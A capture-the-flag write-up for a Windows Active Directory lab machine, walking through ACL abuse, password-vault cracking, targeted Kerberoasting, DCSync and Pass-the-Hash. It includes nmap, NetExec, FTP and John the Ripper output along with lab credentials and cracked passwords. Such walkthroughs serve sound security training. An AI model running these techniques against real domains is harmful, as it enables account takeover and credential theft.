ACL abuse chain on a Windows DC: pivot through AD users via GenericAll/ForceChangePassword, crack an FTP password vault, Kerberoast to DCSync, then Pass-the-Hash for full admin.
Administrator
Difficulty: Medium
OS: Windows
Category: Active Directory
IP:10.129.2.60
Overview
Administrator is a medium-difficulty Windows Active Directory machine. The attack chain involves exploiting a series of AD privilege relationships (ACL abuse) to pivot through multiple domain accounts, eventually gaining DCSync rights and dumping the domain's NTLM hashes. The path is:
Enumeration
Nmap
Clock skew of ~7 hours was noted — relevant for Kerberos, which requires time sync within 5 minutes. Keep in mind when using Kerberos-based attacks.
RID Brute-Force (User Enumeration)
Using NetExec with the provided starting credentials olivia:ichliebedich. This technique enumerates domain users and groups by iterating over Windows Security Identifiers (SIDs). Key accounts discovered:
Foothold — BloodHound ACL Abuse
Olivia → Michael (GenericAll)
BloodHound analysis revealed that Olivia holds GenericAll over the Michael account. GenericAll is effectively full control over an object, it includes the ability to reset the user's password without knowing the current one.
Michael → Benjamin (ForceChangePassword)
BloodHound further showed that Michael holds ForceChangePassword over Benjamin. This is a more targeted ACE (Access Control Entry) that specifically permits password resets.
Michael has no additional privileges beyond what Olivia already had — the sole purpose of this pivot is to reach Benjamin, who has FTP access.
FTP — Backup.psafe3
With Benjamin's credentials, logging into FTP reveals a single file:
Cracking the Password Safe
Backup.psafe3 is a Password Safe v3 database — an encrypted credential vault protected by a master password.
Step 1: Extract the hash with pwsafe2johnStep 2: Crack with John the Ripper against rockyou.txt
Step 3: Open the vault with the master password tekieromucho to retrieve Emily's credentials
now from this .psafe we can get emily's password i.e UXLCI5iETUsIBoFVTj8yQFKoHjXmb
User Flag — Emily via WinRM
Privilege Escalation
Emily → Ethan (Targeted Kerberoasting via GenericWrite)
BloodHound shows Emily has GenericWrite over the Ethan account. GenericWrite allows modification of most non-protected attributes of an AD object, including servicePrincipalName (SPN).
The attack — Targeted Kerberoasting:
The idea is to temporarily assign a fake SPN to Ethan's account. Any account with an SPN registered is eligible for Kerberoasting — the Domain Controller will issue a TGS (Ticket Granting Service) ticket encrypted with Ethan's NTLM hash, which can then be cracked offline.
Note: Shadow Credentials was also attempted (adding a key to msDSKeyCredentialLink), but failed because PKINIT (the Kerberos extension required for certificate-based authentication) was not available or not configured for this environment.
Step 1: Set a fake SPN on Ethan using bloodyAD
who has GetChangesInFilteredSet, GetChanges, GetChangesAll on
Step 2: Request the TGS ticket with impacket-GetUserSPNs. This returns a $krb5tgs$23$*ethan$... hash (RC4-encrypted Kerberos service ticket).
Step 3: Crack with Hashcat:
Then, cracking this hash using hascat gave us the password limpbizkit
Ethan → Administrator (DCSync)
BloodHound shows Ethan holds three critical permissions on the administrator.htb domain object:
GetChanges
GetChangesAll
GetChangesInFilteredSet
Together, GetChanges + GetChangesAll are the exact permissions required to perform a DCSync attack. DCSync mimics the behavior of a Domain Controller replicating directory data — it lets an attacker request the NTLM hash of any account directly from the DC, without needing to touch LSASS or run code on the DC.
Key hashes retrieved:
Root Flag — Pass-the-Hash as Administrator
With the Administrator's NT hash, we perform a Pass-the-Hash attack. PTH works because Windows NTLM authentication accepts the raw hash in place of a password — there is no need to crack it.
┌──(kali㉿kali)-[~]
└─$ nmap 10.129.2.60 -p21,53,88,135,139,389,445,464,593,636,3268,3269,5985 -sCV
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-10 03:23 -0400
Nmap scan report for 10.129.2.60
Host is up (0.43s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-10 14:23:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-03-10T14:23:37
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: 6h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.67 seconds
┌──(kali㉿kali)-[~]
└─$ nxc smb 10.129.2.60 -u "olivia" -p "ichliebedich" --rid-brute
SMB 10.129.2.60 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.2.60 445 DC [+] administrator.htb\olivia:ichliebedich
SMB 10.129.2.60 445 DC 498: ADMINISTRATOR\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.2.60 445 DC 500: ADMINISTRATOR\Administrator (SidTypeUser)
SMB 10.129.2.60 445 DC 501: ADMINISTRATOR\Guest (SidTypeUser)
SMB 10.129.2.60 445 DC 502: ADMINISTRATOR\krbtgt (SidTypeUser)
SMB 10.129.2.60 445 DC 512: ADMINISTRATOR\Domain Admins (SidTypeGroup)
SMB 10.129.2.60 445 DC 513: ADMINISTRATOR\Domain Users (SidTypeGroup)
SMB 10.129.2.60 445 DC 514: ADMINISTRATOR\Domain Guests (SidTypeGroup)
SMB 10.129.2.60 445 DC 515: ADMINISTRATOR\Domain Computers (SidTypeGroup)
SMB 10.129.2.60 445 DC 516: ADMINISTRATOR\Domain Controllers (SidTypeGroup)
SMB 10.129.2.60 445 DC 517: ADMINISTRATOR\Cert Publishers (SidTypeAlias)
SMB 10.129.2.60 445 DC 518: ADMINISTRATOR\Schema Admins (SidTypeGroup)
SMB 10.129.2.60 445 DC 519: ADMINISTRATOR\Enterprise Admins (SidTypeGroup)
SMB 10.129.2.60 445 DC 520: ADMINISTRATOR\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.2.60 445 DC 521: ADMINISTRATOR\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.2.60 445 DC 522: ADMINISTRATOR\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.2.60 445 DC 525: ADMINISTRATOR\Protected Users (SidTypeGroup)
SMB 10.129.2.60 445 DC 526: ADMINISTRATOR\Key Admins (SidTypeGroup)
SMB 10.129.2.60 445 DC 527: ADMINISTRATOR\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.2.60 445 DC 553: ADMINISTRATOR\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.2.60 445 DC 571: ADMINISTRATOR\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.2.60 445 DC 572: ADMINISTRATOR\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.2.60 445 DC 1000: ADMINISTRATOR\DC$ (SidTypeUser)
SMB 10.129.2.60 445 DC 1101: ADMINISTRATOR\DnsAdmins (SidTypeAlias)
SMB 10.129.2.60 445 DC 1102: ADMINISTRATOR\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.2.60 445 DC 1108: ADMINISTRATOR\olivia (SidTypeUser)
SMB 10.129.2.60 445 DC 1109: ADMINISTRATOR\michael (SidTypeUser)
SMB 10.129.2.60 445 DC 1110: ADMINISTRATOR\benjamin (SidTypeUser)
SMB 10.129.2.60 445 DC 1111: ADMINISTRATOR\Share Moderators (SidTypeAlias)
SMB 10.129.2.60 445 DC 1112: ADMINISTRATOR\emily (SidTypeUser)
SMB 10.129.2.60 445 DC 1113: ADMINISTRATOR\ethan (SidTypeUser)
SMB 10.129.2.60 445 DC 3601: ADMINISTRATOR\alexander (SidTypeUser)
SMB 10.129.2.60 445 DC 3602: ADMINISTRATOR\emma (SidTypeUser)
┌──(kali㉿kali)-[~/Documents/administrator]
└─$ ftp [email protected]Connected to 10.129.2.60.
220 Microsoft FTP Service
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||58581|)
125 Data connection already open; Transfer starting.
10-05-24 09:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
ftp> binary
200 Type set to I.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||58585|)
150 Opening BINARY mode data connection.
100% |**********************************************************************************************************************************************************************************************| 952 1.40 KiB/s 00:00 ETA
226 Transfer complete.
952 bytes received in 00:01 (0.89 KiB/s)
┌──(kali㉿kali)-[~/Documents/administrator]
└─$ pwsafe2john Backup.psafe3
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050
┌──(kali㉿kali)-[~/Documents/administrator]
└─$ echo '$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050' > hash.txt
┌──(kali㉿kali)-[~/Documents/administrator]
└─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho (?)
1g 0:00:00:00 DONE (2026-03-10 05:19) 4.166g/s 34133p/s 34133c/s 34133C/s newzealand..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
